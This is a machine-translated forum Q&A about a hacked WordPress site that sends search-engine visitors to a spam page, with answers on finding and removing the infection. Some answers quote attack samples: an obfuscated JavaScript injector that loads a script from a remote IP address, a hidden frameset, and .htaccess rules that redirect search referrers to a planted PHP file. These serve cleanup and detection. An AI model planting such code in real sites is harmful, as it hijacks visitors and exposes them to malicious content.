谷歌搜索后页面重定向 - Wordpress 网站被黑

Posted

技术标签:

【中文标题】谷歌搜索后页面重定向 - Wordpress 网站被黑【英文标题】:page redirect after Google search - Wordpress site hacked 【发布时间】:2014-05-10 13:44:59 【问题描述】:

我们有页面域..,当您在 google.nl 搜索到关键对齐并单击该站点的主页时,几秒钟后您将被重定向到 http://www.venusfactor.com/welcome/。我们认为该网站已被黑客入侵,但找不到重定向或任何东西。

有人可以帮忙吗?

【问题讨论】:

【参考方案1】:

您是否检查过是否在托管域的位置进行了重定向?不知道您使用的是哪种主机,但可能该域已设置为从主机端重定向到该页面。

【讨论】:

【参考方案2】:

当您的网站被黑客入侵时该怎么做的一个很好的指南是:http://codex.wordpress.org/FAQ_My_site_was_hacked

对于您的问题,请先检查 .htaccess。文件的最右侧可能有一些重定向行,因此请使用水平滚动条。

另外,我建议与您的主机核实,因为可能有更多文件受到影响。

【讨论】:

感谢您的回复,我们确实查看了 htacces,但里面什么也没有。我现在正在下载该站点以查看其他文档。您是否有其他文件您认为可能会导致问题?当我查看页面的代码时,我找不到任何东西 现在好像修好了?它不再重定向我。另外,我记得它在短暂延迟后重定向。这可能意味着使用 javascript 进行重定向。检查您的 .js 文件中是否有类似“window.location.href” 是的,我看到 de index.php 和其他文件中有额外的代码。通过 Sucuri.net 检查显示它有恶意软件,但不知道哪些文件也有问题。你知道有一种方法可以检查哪些文件是错误的吗? 如果您可以访问 SSH 并且知道如何使用它,那么我建议您检查最后修改的文件 (***.com/a/1404964/395160) 或搜索包含该字符串(或部分)的文件其中)你在那个 index.php 文件中找到了(***.com/a/8010605/395160)。如果您不擅长 SSH,请下载 mythicsoft.com/agentransack 并在您之前下载的文件中检查该字符串【参考方案3】:

同样的事情也发生在我身上。

首先我认为这是一个 DNS hack 问题,因为它是一个重定向问题。托管公司回复我说 DNS 没有问题。 Tey 检查了其他常见问题以找到重定向的来源,我被告知在活动主题文件夹中的 header.php 文件中有一个恶意脚本

我在 cPanel 中手动检查了文件,并找到了导致重定向的脚本。要了解有关此的更多信息,请查看IStartBlogging上的文章

【讨论】:

【参考方案4】:

一种新病毒正在传播,它滥用 wordpress 的 xmlrpc.php 将自己注入服务器并用自己的受污染副本替换 javascript 文件。

如果您看到太多 xmlrpc 请求来自可疑 IP 地址的 POST 请求,如下所示,请验证您的 javascript 文件的完整性。

$text = 'var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))

该病毒的一个关键特征是,它主要针对 jQuery.js,将其替换为自己的版本(当用户浏览您的网站时,自动将他们重定向到点击诱饵文章)。

它通过首先发布一个新的 php 文件来实现这一点,例如 recure.php 通常包含混淆的 php 代码,或者将 wordpress 插件上传到上传文件夹。

【讨论】:

【参考方案5】:

如果引用的页面是 google、yahoo、msn、aol、bing,则攻击者很可能试图将页面重定向到不同的网站。 当我们从上面指定的引荐中请求页面时,他们将返回一个框架集(类似于 iframe)。

 <frameset rows="*,0" framespacing="0" border="0" frameborder="NO" data-gr-c-s-loaded="true">
        <frame src="http://remote_site_address_here" noresize="" scrolling="auto">
        <link rel="stylesheet" type="text/css" href="chrome-extensionlink/content.css">
</frameset>

所以我们会在地址栏顶部看到我们的网站名称,但网站内容会有所不同。这些是黑客用来注入可疑代码的常用文件。

    index.php index.html header.php footer.php functions.php 主题文件 .htaccess

现在最近感染的案例显示恶意代码注入是使用 .htaccess 文件。这里我演示注入的 .htaccess 文件。 打开 Web 根目录中的 .htaccess 文件。你可以看到这个配置

RewriteEngine On
RewriteCond %HTTP_USER_AGENT (google|yahoo|msn|aol|bing) [OR]
RewriteCond %HTTP_REFERER (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ emilie-amethyst.php?$1 [L]

如果推荐页面是 google|yahoo|msn|aol|bing,他们会在此处重定向到恶意 php 文件 emilie-amethyst.php。这就是重定向问题的原因。 因此,您必须从 .htaccess 文件中删除此重定向配置,并删除恶意脚本(在本例中为 emilie-amethyst.php)。

尝试点击谷歌搜索中的链接。不过,如果您发现问题,请删除与此特定站点相关的所有 cookie 并重试。它应该可以解决问题

【讨论】:

以上是关于谷歌搜索后页面重定向 - Wordpress 网站被黑的主要内容,如果未能解决你的问题,请参考以下文章

更新 XAMPP 后,现有的 Wordpress 网站会重定向到安装页面?

WordPress 管理页面重定向到主页

网站改版页面如何做301重定向跳转

WordPress用户登录后重定向到指定页面

登录后如何将WordPress用户重定向到上一页

黑客入侵 Wordpress 网站后删除缓存